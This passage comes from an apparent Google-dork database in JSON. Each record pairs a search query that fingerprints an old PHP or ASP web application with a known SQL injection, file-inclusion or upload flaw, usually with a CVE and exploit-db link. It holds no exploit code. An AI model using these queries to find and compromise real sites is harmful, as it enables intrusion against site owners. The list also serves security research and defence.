"allinurl:/phpress/", "id": 1936}, {"short description": "\"Powered by sendcard - an advanced PHP e-card program\" -site:sendcard.org", "long 
description": "Sendcard 3.4.1 (sendcard.php form) Local File Inclusion Vulnerability - CVE: 2007-2471: http://www.exploit-db.com/exploits/3827", "submited": "2010-11-15", "request": "\"Powered by sendcard - an advanced PHP e-card program\" -site:sendcard.org", "id": 1937}, {"short description": "intext: \"Powered by Marinet\"", "long description": "Marinet cms SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12575", "submited": "2010-11-15", "request": "intext: \"Powered by Marinet\"", "id": 1942}, {"short description": "UPublisher", "long description": "UPublisher 1.0 (viewarticle.asp) Remote SQL Injection Vulnerability - CVE: 2006-5888: http://www.exploit-db.com/exploits/2765", "submited": "2010-11-15", "request": "UPublisher", "id": 1943}, {"short description": "intitle:\"Answer Builder\" Ask a question", "long description": "Expert Advisior (index.php id) Remote SQL Injection Vulnerbility - CVE: 2007-3882: http://www.exploit-db.com/exploits/4189", "submited": "2010-11-15", "request": "intitle:\"Answer Builder\" Ask a question", "id": 1944}, {"short description": "inurl:\"tinybrowser.php?\"", "long description": "TinyBrowser Remote File upload Vulnerability: http://www.exploit-db.com/exploits/12692", "submited": "2010-11-15", "request": "inurl:\"tinybrowser.php?\"", "id": 1945}, {"short description": "inurl:\"product_desc.php?id=\" Powered by Zeeways.com", "long description": "ZeeWays Script SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11087", "submited": "2010-11-15", "request": "inurl:\"product_desc.php?id=\" Powered by Zeeways.com", "id": 1946}, {"short description": "\"Powered by ECShop v2.5.0\"", "long description": "ECShop 2.5.0 (order_sn) Remote SQL Injection Vulnerability - CVE: 2009-1622: http://www.exploit-db.com/exploits/8548", "submited": "2010-11-15", "request": "\"Powered by ECShop v2.5.0\"", "id": 1947}, {"short description": "\"powered by Photo-Graffix Flash Image Gallery\"", "long description": "Photo Graffix 
3.4 Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/8372", "submited": "2010-11-15", "request": "\"powered by Photo-Graffix Flash Image Gallery\"", "id": 1948}, {"short description": "\"inc_webblogmanager.asp\"", "long description": "DMXReady Registration Manager 1.1 Arbitrary File Upload Vulnerability - CVE: 2009-2238: http://www.exploit-db.com/exploits/8749", "submited": "2010-11-15", "request": "\"inc_webblogmanager.asp\"", "id": 1949}, {"short description": "inurl:tr.php?id=", "long description": "Downline Goldmine Category Addon (id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6947", "submited": "2010-11-15", "request": "inurl:tr.php?id=", "id": 1950}, {"short description": "inurl:index.php?mod=jeuxflash", "long description": "KwsPHP Module jeuxflash (cat) Remote SQL Injection Vulnerability - CVE: 2008-1759: http://www.exploit-db.com/exploits/5352", "submited": "2010-11-15", "request": "inurl:index.php?mod=jeuxflash", "id": 1951}, {"short description": "allinurl :\"modules/gallery\"", "long description": "XOOPS Module Gallery 0.2.2 (gid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5241", "submited": "2010-11-15", "request": "allinurl :\"modules/gallery\"", "id": 1952}, {"short description": "intext:\"Design by MMA Creative\"", "long description": "MMA Creative Design SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12706", "submited": "2010-11-15", "request": "intext:\"Design by MMA Creative\"", "id": 1953}, {"short description": "inurl:tr.php?id=", "long description": "Downline Goldmine Builder (tr.php id) Remote SQL Injection Vulnerability - CVE: 2008-4178: http://www.exploit-db.com/exploits/6946", "submited": "2010-11-15", "request": "inurl:tr.php?id=", "id": 1954}, {"short description": "''com_noticias''", "long description": "Joomla Component com_noticias 1.0 SQL Injection Vulnerability - CVE: 2008-0670: http://www.exploit-db.com/exploits/5081", "submited": "2010-11-15", 
"request": "''com_noticias''", "id": 1955}, {"short description": "\"MobPartner Counter\" \"upload files\"", "long description": "MobPartner Counter - Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/11019", "submited": "2010-11-15", "request": "\"MobPartner Counter\" \"upload files\"", "id": 1956}, {"short description": "allinurl: \"modules/glossaires\"", "long description": "XOOPS Module Glossario 2.2 (sid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5216", "submited": "2010-11-15", "request": "allinurl: \"modules/glossaires\"", "id": 1957}, {"short description": "inurl:com_netinvoice", "long description": "Joomla Component netinvoice 1.2.0 SP1 SQL Injection Vulnerability - CVE: 2008-3498: http://www.exploit-db.com/exploits/5939", "submited": "2010-11-15", "request": "inurl:com_netinvoice", "id": 1958}, {"short description": ": inurl:\"read.php?datespan=\"", "long description": "http://www.exploit-db.com/exploits/5703", "submited": "2010-11-15", "request": "", "id": 1959}, {"short description": "inurl:com_beamospetition", "long description": "Joomla Component beamospetition Remote SQL Injection Vulnerability - CVE: 2008-3132: http://www.exploit-db.com/exploits/5965", "submited": "2010-11-15", "request": "inurl:com_beamospetition", "id": 1960}, {"short description": "\"com_lmo\"", "long description": "Joomla LMO Component 1.0b2 Remote Include Vulnerability - CVE: 2006-3970: http://www.exploit-db.com/exploits/2092", "submited": "2010-11-15", "request": "\"com_lmo\"", "id": 1961}, {"short description": "\"Powered by Clicknet CMS\"", "long description": "Clicknet CMS 2.1 (side) Arbitrary File Disclosure Vulnlerability - CVE: 2009-2325: http://www.exploit-db.com/exploits/9037", "submited": "2010-11-15", "request": "\"Powered by Clicknet CMS\"", "id": 1962}, {"short description": "Igloo (interest group glue)", "long description": "Igloo 0.1.9 (Wiki.php) Remote File Include Vulnerability - CVE: 2006-2819: 
http://www.exploit-db.com/exploits/1863", "submited": "2010-11-15", "request": "Igloo (interest group glue)", "id": 1963}, {"short description": "inurl:\"com_acstartseite\"", "long description": "Joomla Component com_acstartseite Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11479", "submited": "2010-11-15", "request": "inurl:\"com_acstartseite\"", "id": 1964}, {"short description": "\"Powered by Populum\"", "long description": "Populum 2.3 SQL injection vulnerability: http://www.exploit-db.com/exploits/11126", "submited": "2010-11-15", "request": "\"Powered by Populum\"", "id": 1965}, {"short description": "\"Powered by PWP Version 1-5-1\" AND inurl:\"/wiki/run.php\"", "long description": "PWP Wiki Processor 1-5-1 Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/7740", "submited": "2010-11-15", "request": "\"Powered by PWP Version 1-5-1\" AND inurl:\"/wiki/run.php\"", "id": 1967}, {"short description": "intext:\"Design by BB Media.Org\"", "long description": "BBMedia Design's SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12711", "submited": "2010-11-15", "request": "intext:\"Design by BB Media.Org\"", "id": 1968}, {"short description": "inurl:\"com_acprojects\"", "long description": "Joomla Component com_acprojects Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11480", "submited": "2010-11-15", "request": "inurl:\"com_acprojects\"", "id": 1969}, {"short description": "inurl:\"com_acteammember\"", "long description": "Joomla Component com_acteammember SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11483", "submited": "2010-11-15", "request": "inurl:\"com_acteammember\"", "id": 1970}, {"short description": "Powered by Maian Weblog v4.0", "long description": "Maian Weblog 4.0 Insecure Cookie Handling Vulnerability - CVE: 2008-3318: http://www.exploit-db.com/exploits/6064", "submited": "2010-11-15", "request": "Powered by Maian Weblog v4.0", "id": 1971}, {"short description": 
"Powered by: Maian Recipe v1.2", "long description": "Maian Recipe 1.2 Insecure Cookie Handling Vulnerability - CVE: 2008-3322: http://www.exploit-db.com/exploits/6063", "submited": "2010-11-15", "request": "Powered by: Maian Recipe v1.2", "id": 1972}, {"short description": "Powered by: Maian Search v1.1", "long description": "Maian Search 1.1 Insecure Cookie Handling Vulnerability - CVE: 2008-3317: http://www.exploit-db.com/exploits/6066", "submited": "2010-11-15", "request": "Powered by: Maian Search v1.1", "id": 1973}, {"short description": "Powered by: Maian Links v3.1", "long description": "Maian Links 3.1 Insecure Cookie Handling Vulnerability - CVE: 2008-3319: http://www.exploit-db.com/exploits/6062", "submited": "2010-11-15", "request": "Powered by: Maian Links v3.1", "id": 1974}, {"short description": "Powered by: Maian Uploader v4.0", "long description": "Maian Uploader 4.0 Insecure Cookie Handling Vulnerability - CVE: 2008-3321: http://www.exploit-db.com/exploits/6065", "submited": "2010-11-15", "request": "Powered by: Maian Uploader v4.0", "id": 1975}, {"short description": "\"Powered By Steamcast \"0.9.75 beta", "long description": "Steamcast 0.9.75b Remote Denial of Service: http://www.exploit-db.com/exploits/8429", "submited": "2010-11-15", "request": "\"Powered By Steamcast \"0.9.75 beta", "id": 1976}, {"short description": "Powered by Maian Guestbook v3.2", "long description": "Maian Guestbook 3.2 Insecure Cookie Handling Vulnerability - CVE: 2008-3320: http://www.exploit-db.com/exploits/6061", "submited": "2010-11-15", "request": "Powered by Maian Guestbook v3.2", "id": 1977}, {"short description": "inurl:acrotxt.php wbb", "long description": "WBB2-Addon: Acrotxt v1 (show) Remote SQL Injection Vulnerability - CVE: 2007-4581: http://www.exploit-db.com/exploits/4327", "submited": "2010-11-15", "request": "inurl:acrotxt.php wbb", "id": 1978}, {"short description": "Designed by:InterTech Co", "long description": "InterTech Co 1.0 SQL Injection: 
http://www.exploit-db.com/exploits/11440", "submited": "2010-11-15", "request": "Designed by:InterTech Co", "id": 1981}, {"short description": "allinurl: cid\"modules/classifieds/index.php?pa=Adsview\"", "long description": "XOOPS Module classifieds (cid) Remote SQL Injection Vulnerability - CVE: 2008-0873: http://www.exploit-db.com/exploits/5158", "submited": "2010-11-15", "request": "allinurl: cid\"modules/classifieds/index.php?pa=Adsview\"", "id": 1982}, {"short description": "News powered by ashnews", "long description": "ashNews 0.83 (pathtoashnews) Remote File Include Vulnerabilities - CVE: 2003-1292: http://www.exploit-db.com/exploits/1864", "submited": "2010-11-15", "request": "News powered by ashnews", "id": 1984}, {"short description": "\"Transloader by Somik.org\" OR \"Transloader by\" OR \"Transloder\"", "long description": "Transload Script Upload Vulnerability: http://www.exploit-db.com/exploits/11155", "submited": "2010-11-15", "request": "\"Transloader by Somik.org\" OR \"Transloader by\" OR \"Transloder\"", "id": 1985}, {"short description": "allinurl: \"modules MyAnnonces index php pa view\"", "long description": "RunCMS Module MyAnnonces (cid) SQL Injection Vulnerability - CVE: 2008-0878: http://www.exploit-db.com/exploits/5156", "submited": "2010-11-15", "request": "allinurl: \"modules MyAnnonces index php pa view\"", "id": 1986}, {"short description": "\"News Managed by Ditto News\"", "long description": "Xtreme/Ditto News 1.0 (post.php) Remote File Include Vulnerability: http://www.exploit-db.com/exploits/1887", "submited": "2010-11-15", "request": "\"News Managed by Ditto News\"", "id": 1987}, {"short description": "Powered by ArticlesOne.com oR Website Powered by ArticlesOne.com", "long description": "ArticlesOne 07232006 (page) Remote Include Vulnerability: http://www.exploit-db.com/exploits/2063", "submited": "2010-11-15", "request": "Powered by ArticlesOne.com oR Website Powered by ArticlesOne.com", "id": 1988}, {"short description": 
"Coded By WebLOADER", "long description": "Webloader v7 - v8 ( vid ) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12647", "submited": "2010-11-15", "request": "Coded By WebLOADER", "id": 1989}, {"short description": "\"Powered by Philboard\" inurl:\"philboard_forum.asp\"", "long description": "Philboard 1.14 (philboard_forum.asp) SQL Injection Vulnerability - CVE: 2007-0920: http://www.exploit-db.com/exploits/3295", "submited": "2010-11-15", "request": "\"Powered by Philboard\" inurl:\"philboard_forum.asp\"", "id": 1990}, {"short description": "\"powered by CubeCart\" inurl:\"index.php?_a=\"", "long description": "CubeCart (index.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11495", "submited": "2010-11-15", "request": "\"powered by CubeCart\" inurl:\"index.php?_a=\"", "id": 1991}, {"short description": "inurl:\"com_jjgallery", "long description": "Joomla Component Carousel Flash Image Gallery RFI Vulnerability - CVE: 2007-6027: http://www.exploit-db.com/exploits/4626", "submited": "2010-11-15", "request": "inurl:\"com_jjgallery", "id": 1992}, {"short description": "intext:\"jPORTAL 2\" inurl:\"mailer.php\"", "long description": "jPORTAL 2 mailer.php Remote SQL Injection Vulnerability - CVE: 2007-5974: http://www.exploit-db.com/exploits/4611", "submited": "2010-11-15", "request": "intext:\"jPORTAL 2\" inurl:\"mailer.php\"", "id": 1993}, {"short description": "intext: \"Site developed & mantained by Woodall Creative Group\"", "long description": "Woodall Creative SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12576", "submited": "2010-11-15", "request": "intext: \"Site developed & mantained by Woodall Creative Group\"", "id": 1994}, {"short description": "inurl:CuteSoft_Client/CuteEditor", "long description": "Cute Editor ASP.NET Remote File Disclosure Vulnerability - CVE: 2009-4665: http://www.exploit-db.com/exploits/8785", "submited": "2010-11-15", "request": "inurl:CuteSoft_Client/CuteEditor", "id": 
1996}, {"short description": "\"Web Group Communication Center beta 0.5.6\" OR \"Web Group Communication Center beta 0.5.5\"", "long description": "WGCC 0.5.6b (quiz.php) Remote SQL Injection Vulnerability - CVE: 2006-5514: http://www.exploit-db.com/exploits/2604", "submited": "2010-11-15", "request": "\"Web Group Communication Center beta 0.5.6\" OR \"Web Group Communication Center beta 0.5.5\"", "id": 1997}, {"short description": "Actionne par smartblog", "long description": "Smartblog (index.php tid) Remote SQL Injection Vulnerability - CVE: 2008-2185: http://www.exploit-db.com/exploits/5535", "submited": "2010-11-15", "request": "Actionne par smartblog", "id": 1998}, {"short description": "inurl:\"picture.php?cat=\" \"Powered by PhpWebGallery 1.3.4\"", "long description": "PhpWebGallery 1.3.4 (cat) Blind SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6436", "submited": "2010-11-15", "request": "inurl:\"picture.php?cat=\" \"Powered by PhpWebGallery 1.3.4\"", "id": 1999}, {"short description": "inurl:tr.php?id=", "long description": "Downline Goldmine newdownlinebuilder (tr.php id) SQL Injection Vuln: http://www.exploit-db.com/exploits/6951", "submited": "2010-11-15", "request": "inurl:tr.php?id=", "id": 2000}, {"short description": "inurl:tr.php?id=", "long description": "Downline Goldmine paidversion (tr.php id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6950", "submited": "2010-11-15", "request": "inurl:tr.php?id=", "id": 2001}, {"short description": "allintext:\"Browse Blogs by Category\"", "long description": "Blog System 1.x (index.php news_id) Remote SQL Injection Vulnerability - CVE: 2007-3979: http://www.exploit-db.com/exploits/4206", "submited": "2010-11-15", "request": "allintext:\"Browse Blogs by Category\"", "id": 2002}, {"short description": "inurl:option=com_mydyngallery", "long description": "Joomla Component mydyngallery 1.4.2 (directory) SQL Injection Vuln - CVE: 2008-5957: 
http://www.exploit-db.com/exploits/7343", "submited": "2010-11-15", "request": "inurl:option=com_mydyngallery", "id": 2004}, {"short description": "inurl:index.php?mod=sondages", "long description": "KwsPHP 1.0 sondages Module Remote SQL Injection Vulnerability - CVE: 2007-4979: http://www.exploit-db.com/exploits/4422", "submited": "2010-11-15", "request": "inurl:index.php?mod=sondages", "id": 2006}, {"short description": "inurl:\"tr1.php?id=\" Forced Matrix", "long description": "YourFreeWorld Forced Matrix Script (id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6939", "submited": "2010-11-15", "request": "inurl:\"tr1.php?id=\" Forced Matrix", "id": 2009}, {"short description": "allintext:\"SuperCali Event Calendar\"", "long description": "SuperCali PHP Event Calendar 0.4.0 SQL Injection Vulnerability - CVE: 2007-3582: http://www.exploit-db.com/exploits/4141", "submited": "2010-11-15", "request": "allintext:\"SuperCali Event Calendar\"", "id": 2010}, {"short description": "inurl:\"com_ckforms\"", "long description": "Joomla Component (com_ckforms) Local File Inclusion Vulnerability: http://www.exploit-db.com/exploits/15453", "submited": "2010-11-15", "request": "inurl:\"com_ckforms\"", "id": 2011}, {"short description": "inurl:\"com_prayercenter\"", "long description": "Joomla Component prayercenter 1.4.9 (id) SQL Injection Vulnerability - CVE: 2008-6429: http://www.exploit-db.com/exploits/5708/", "submited": "2010-11-15", "request": "inurl:\"com_prayercenter\"", "id": 2012}, {"short description": "\"Powered by Glossword 1.8.11\" OR \"Powered by Glossword 1.8.6\"", "long description": "Glossword 1.8.11 (index.php x) Local File Inclusion Vulnerability: http://www.exploit-db.com/exploits/9010", "submited": "2010-11-15", "request": "\"Powered by Glossword 1.8.11\" OR \"Powered by Glossword 1.8.6\"", "id": 2013}, {"short description": "ADP Forum 2.0.3 is powered by VzScripts", "long description": "Vz (Adp) Forum 2.0.3 Remote Password Disclosure 
Vulnerablity - CVE: 2006-6891: http://www.exploit-db.com/exploits/3053", "submited": "2010-11-15", "request": "ADP Forum 2.0.3 is powered by VzScripts", "id": 2014}, {"short description": "inurl:\"com_ccnewsletter\"", "long description": "Joomla Component com_ccnewsletter LFI Vulnerability - CVE: 2010-0467: http://www.exploit-db.com/exploits/11282", "submited": "2010-11-15", "request": "inurl:\"com_ccnewsletter\"", "id": 2015}, {"short description": "inurl:\"add_soft.php\"", "long description": "Software Index 1.1 (cid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5378", "submited": "2010-11-15", "request": "inurl:\"add_soft.php\"", "id": 2016}, {"short description": "pages.php?id= \"Multi Vendor Mall\"", "long description": "Multi Vendor Mall (itemdetail.php & shop.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12755", "submited": "2010-11-15", "request": "pages.php?id= \"Multi Vendor Mall\"", "id": 2017}, {"short description": "\"Search Affiliate Programs:\"", "long description": "Affiliate Directory (cat_id) Remote SQL Injection Vulnerbility: http://www.exploit-db.com/exploits/5363", "submited": "2010-11-15", "request": "\"Search Affiliate Programs:\"", "id": 2018}, {"short description": "intitle:\"Dacio's Image Gallery\"", "long description": "Dacio's Image Gallery 1.6 (DT/Bypass/SU) Remote Vulnerabilities: http://www.exploit-db.com/exploits/8653", "submited": "2010-11-15", "request": "intitle:\"Dacio's Image Gallery\"", "id": 2019}, {"short description": "\"Website by Spokane Web Communications\"", "long description": "ArticleLive (Interspire Website Publisher) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12526", "submited": "2010-11-15", "request": "\"Website by Spokane Web Communications\"", "id": 2020}, {"short description": "\"powered by: elkagroup\"", "long description": "elkagroup SQL Injection Vulnerability - CVE: 2009-4569: http://www.exploit-db.com/exploits/10330", "submited": 
"2010-11-15", "request": "\"powered by: elkagroup\"", "id": 2022}, {"short description": "allinurl:/myspeach/", "long description": "MySpeach 3.0.2 (my_ms[root]) Remote File Include Vulnerability - CVE: 2006-4630: http://www.exploit-db.com/exploits/2301", "submited": "2010-11-15", "request": "allinurl:/myspeach/", "id": 2023}, {"short description": "Powered by Revsense", "long description": "RevSense (Auth bypass) Remote SQL Injection Vulnerability - CVE: 2008-6309: http://www.exploit-db.com/exploits/7163", "submited": "2010-11-15", "request": "Powered by Revsense", "id": 2024}, {"short description": "724CMS Powered, 724CMS Version 4.59. Enterprise", "long description": "724CMS Enterprise Version 4.59 SQL Injection Vulnerability - CVE: 2008-1858: http://www.exploit-db.com/exploits/12560", "submited": "2010-11-15", "request": "724CMS Powered, 724CMS Version 4.59. Enterprise", "id": 2025}, {"short description": "index.php?option=com_facileforms", "long description": "Joomla Component com_facileforms 1.4.4 RFI Vulnerability - CVE: 2008-2990: http://www.exploit-db.com/exploits/5915", "submited": "2010-11-15", "request": "index.php?option=com_facileforms", "id": 2026}, {"short description": "Powered By phUploader", "long description": "phUploader Remote File Upload Vulnerability - CVE: 2007-4527: http://www.exploit-db.com/exploits/10574", "submited": "2010-11-15", "request": "Powered By phUploader", "id": 2027}, {"short description": "inurl:\"myLDlinker.php\"", "long description": "WordPress Plugin myLDlinker SQL Injection Vulnerability - CVE: 2010-2924: http://www.exploit-db.com/exploits/14441", "submited": "2010-11-15", "request": "inurl:\"myLDlinker.php\"", "id": 2028}, {"short description": "inurl:com_idoblog", "long description": "Joomla Component iDoBlog b24 Remote SQL Injection Vulnerability - CVE: 2008-2627: http://www.exploit-db.com/exploits/5730", "submited": "2010-11-15", "request": "inurl:com_idoblog", "id": 2029}, {"short description": "/modules/xhresim/", 
"long description": "XOOPS Module xhresim (index.php no) Remote SQL Injection Vuln - CVE: 2008-5665: http://www.exploit-db.com/exploits/6748", "submited": "2010-11-15", "request": "/modules/xhresim/", "id": 2030}, {"short description": "Maian Events v2.0 Copyright 2005-2008 Maian Script World. All Rights Reserved", "long description": "Maian Events 2.0 Insecure Cookie Handling Vulnerability: http://www.exploit-db.com/exploits/6048", "submited": "2010-11-15", "request": "Maian Events v2.0 Copyright 2005-2008 Maian Script World. All Rights Reserved", "id": 2032}, {"short description": "\"Powered by FubarForum v1.5\"", "long description": "FubarForum 1.5 (index.php page) Local File Inclusion Vulnerability - CVE: 2008-2887: http://www.exploit-db.com/exploits/5872", "submited": "2010-11-15", "request": "\"Powered by FubarForum v1.5\"", "id": 2033}, {"short description": "/modules/amevents/print.php?id=", "long description": "XOOPS Module Amevents (print.php id) SQL Injection Vulnerability - CVE: 2008-5768: http://www.exploit-db.com/exploits/7479", "submited": "2010-11-15", "request": "/modules/amevents/print.php?id=", "id": 2034}, {"short description": "allinurl: com_gallery \"func\"", "long description": "Mambo Component com_gallery Remote SQL Injection Vulnerability - CVE: 2008-0746: http://www.exploit-db.com/exploits/5084", "submited": "2010-11-15", "request": "allinurl: com_gallery \"func\"", "id": 2036}, {"short description": "\"pForum 1.29a\" OR \"\"Powie's PSCRIPT Forum 1.26\"", "long description": "Powies pForum 1.29a (editpoll.php) SQL Injection Vulnerability - CVE: 2006-6038: http://www.exploit-db.com/exploits/2797", "submited": "2010-11-15", "request": "\"pForum 1.29a\" OR \"\"Powie's PSCRIPT Forum 1.26\"", "id": 2037}, {"short description": "allinurl: \"/modules/myTopics/\"", "long description": "XOOPS Module myTopics (articleid) Remote SQL Injection Vulnerability - CVE: 2008-0847: http://www.exploit-db.com/exploits/5148", "submited": "2010-11-15", 
"request": "allinurl: \"/modules/myTopics/\"", "id": 2038}, {"short description": "inurl:\"com_ckforms\"", "long description": "Joomla Component com_ckforms Multiple Vulnerabilities - CVE: 2010-1344: http://www.exploit-db.com/exploits/11785", "submited": "2010-11-15", "request": "inurl:\"com_ckforms\"", "id": 2039}, {"short description": "allinurl:\"index.php?site=\" \"W-Agora\"", "long description": "w-Agora 4.2.1 (cat) Remote SQL Injection Vulnerability - CVE: 2007-6647: http://www.exploit-db.com/exploits/4817", "submited": "2010-11-15", "request": "allinurl:\"index.php?site=\" \"W-Agora\"", "id": 2040}, {"short description": "inurl:categoria.php?ID= comune", "long description": "Prometeo v1.0.65 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14806", "submited": "2010-11-15", "request": "inurl:categoria.php?ID= comune", "id": 2041}, {"short description": "inurl:\"index.php?m_id=\"", "long description": "slogan design Script SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12849", "submited": "2010-11-15", "request": "inurl:\"index.php?m_id=\"", "id": 2043}, {"short description": "Powered by MVC-Web CMS inurl:/index.asp?newsid=", "long description": "MVC-Web CMS 1.0/1.2 (index.asp newsid) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5912", "submited": "2010-11-15", "request": "Powered by MVC-Web CMS inurl:/index.asp?newsid=", "id": 2044}, {"short description": "allinurl: \"showCat.php?cat_id\"", "long description": "D.E. 
Classifieds (cat_id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5291", "submited": "2010-11-15", "request": "allinurl: \"showCat.php?cat_id\"", "id": 2045}, {"short description": "\"Web site engine's code is copyright 2001-2007 ATutor\"", "long description": "ATutor 1.6.1-pl1 (import.php) Remote File Inclusion Vulnerability - CVE: 2008-3368: http://www.exploit-db.com/exploits/6153", "submited": "2010-11-15", "request": "\"Web site engine's code is copyright 2001-2007 ATutor\"", "id": 2046}, {"short description": "\"PhpLinkExchange v1.02\"", "long description": "PhpLinkExchange v1.02 - XSS/Upload Vulerability - CVE: 2008-3679: http://www.exploit-db.com/exploits/10495", "submited": "2010-11-15", "request": "\"PhpLinkExchange v1.02\"", "id": 2047}, {"short description": "\"ClanSys v.1.1\"", "long description": "Clansys v.1.1 (index.php page) PHP Code Insertion Vulnerability - CVE: 2006-2005: http://www.exploit-db.com/exploits/1710", "submited": "2010-11-15", "request": "\"ClanSys v.1.1\"", "id": 2048}, {"short description": "inurl:inc_accountlistmanager.asp", "long description": "DMXReady Account List Manager 1.1 Contents Change Vulnerability: http://www.exploit-db.com/exploits/7754", "submited": "2010-11-15", "request": "inurl:inc_accountlistmanager.asp", "id": 2049}, {"short description": "inurl:com_jomestate", "long description": "Joomla Hot Property com_jomestate RFI Vulnerability: http://www.exploit-db.com/exploits/13956", "submited": "2010-11-15", "request": "inurl:com_jomestate", "id": 2050}, {"short description": "Cr par Narfight, ClanLite V2.2006.05.20 2000-2005", "long description": "ClanLite 2.x (SQL Injection/XSS) Multiple Remote Vulnerabilities - CVE: 2008-5215: http://www.exploit-db.com/exploits/5595", "submited": "2010-11-15", "request": "Cr par Narfight, ClanLite V2.2006.05.20 2000-2005", "id": 2051}, {"short description": "\"Members Statistics\" +\"Total Members\" +\"Guests Online\"", "long description": "AR Memberscript 
(usercp_menu.php) Remote File Include Vulnerability - CVE: 2006-6590: http://www.exploit-db.com/exploits/2931", "submited": "2010-11-15", "request": "\"Members Statistics\" +\"Total Members\" +\"Guests Online\"", "id": 2052}, {"short description": "\"Copyright Interactivefx.ie\"", "long description": "Interactivefx.ie CMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11873", "submited": "2010-11-15", "request": "\"Copyright Interactivefx.ie\"", "id": 2053}, {"short description": "\"Powered by Atomic Photo Album\" inurl:\"photo.php?apa_album_ID=\"", "long description": "Atomic Photo Album 1.0.2 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/14801", "submited": "2010-11-15", "request": "\"Powered by Atomic Photo Album\" inurl:\"photo.php?apa_album_ID=\"", "id": 2054}, {"short description": "inurl:tr.php?id= Hosting", "long description": "YourFreeWorld Classifieds Hosting (id) SQL Injection Vulnerability - CVE: 2008-4884: http://www.exploit-db.com/exploits/6948", "submited": "2010-11-15", "request": "inurl:tr.php?id= Hosting", "id": 2055}, {"short description": "allinur:com_extended_registration", "long description": "Mambo com_registration_detailed 4.1 Remote File Include - CVE: 2006-5254: http://www.exploit-db.com/exploits/2379", "submited": "2010-11-15", "request": "allinur:com_extended_registration", "id": 2056}, {"short description": "\"100% | 50% | 25%\" \"Back to gallery\" inurl:\"show.php?imageid=\"", "long description": "Easy Photo Gallery 2.1 Arbitrary Add Admin / remove user Vulnerability - CVE: 2008-4167: http://www.exploit-db.com/exploits/6437", "submited": "2010-11-15", "request": "\"100% | 50% | 25%\" \"Back to gallery\" inurl:\"show.php?imageid=\"", "id": 2057}, {"short description": "inurl:com_rapidrecipe \"recipe_id\"", "long description": "Joomla Component rapidrecipe Remote SQL injection Vulnerability - CVE: 2008-2697: http://www.exploit-db.com/exploits/5759", "submited": "2010-11-15", "request": 
"inurl:com_rapidrecipe \"recipe_id\"", "id": 2058}, {"short description": "\"Powered by SoftbizScripts\" \"OUR SPONSORS\"", "long description": "Softbiz Link Directory Script Remote SQL Injection Vulnerability - CVE: 2007-5996: http://www.exploit-db.com/exploits/4620", "submited": "2010-11-15", "request": "\"Powered by SoftbizScripts\" \"OUR SPONSORS\"", "id": 2059}, {"short description": "Powered by PowerPortal v1.3a", "long description": "PowerPortal 1.3a (index.php) Remote File Include Vulnerability - CVE: 2006-5126: http://www.exploit-db.com/exploits/2454", "submited": "2010-11-15", "request": "Powered by PowerPortal v1.3a", "id": 2060}, {"short description": "Powered by DUdforum 3.0 inurl:/forums.asp?iFor=", "long description": "DUdForum 3.0 (forum.asp iFor) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5894", "submited": "2010-11-15", "request": "Powered by DUdforum 3.0 inurl:/forums.asp?iFor=", "id": 2061}, {"short description": "\"powered by kure\"", "long description": "Kure 0.6.3 (index.php post,doc) Local File Inclusion Vulnerability - CVE: 2008-4632: http://www.exploit-db.com/exploits/6767", "submited": "2010-11-15", "request": "\"powered by kure\"", "id": 2062}, {"short description": "\"Liberum Help Desk, Copyright (C) 2001 Doug Luxem\"", "long description": "Liberum Help Desk 0.97.3 (SQL/DD) Remote Vulnerabilities - CVE: 2008-6057: http://www.exploit-db.com/exploits/7493", "submited": "2010-11-15", "request": "\"Liberum Help Desk, Copyright (C) 2001 Doug Luxem\"", "id": 2065}, {"short description": "inurl:modules.php?name=Shopping_Cart", "long description": "PHP-Nuke Module Emporium 2.3.0 (id_catg) SQL Injection Vulnerability - CVE: 2007-1034: http://www.exploit-db.com/exploits/10615", "submited": "2010-11-15", "request": "inurl:modules.php?name=Shopping_Cart", "id": 2066}, {"short description": "allinurl: galid \"index.php?p=gallerypic\"", "long description": "Koobi Pro 6.25 gallery Remote SQL Injection Vulnerability: 
http://www.exploit-db.com/exploits/5413", "submited": "2010-11-15", "request": "allinurl: galid \"index.php?p=gallerypic\"", "id": 2067}, {"short description": "intext:\"powered by itaco group\"", "long description": "ITaco Group ITaco.biz (view_news) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11012", "submited": "2010-11-15", "request": "intext:\"powered by itaco group\"", "id": 2068}, {"short description": "\"Powered by yappa-ng 2.3.1\" AND \"Powered by yappa-ng 2.3.1\"", "long description": "yappa-ng 2.3.1 (admin_modules) Remote File Include Vulnerability: http://www.exploit-db.com/exploits/2292", "submited": "2010-11-15", "request": "\"Powered by yappa-ng 2.3.1\" AND \"Powered by yappa-ng 2.3.1\"", "id": 2069}, {"short description": "mediaHolder.php?id", "long description": "WordPress Media Holder (mediaHolder.php id) SQL Injection Vuln: http://www.exploit-db.com/exploits/6842", "submited": "2010-11-15", "request": "mediaHolder.php?id", "id": 2070}, {"short description": "\"ActualAnalyzer Lite (free) 2.78\"+\"Copyright 2006 ActualScripts\"", "long description": "ActualAnalyzer Lite (free) 2.78 Local File 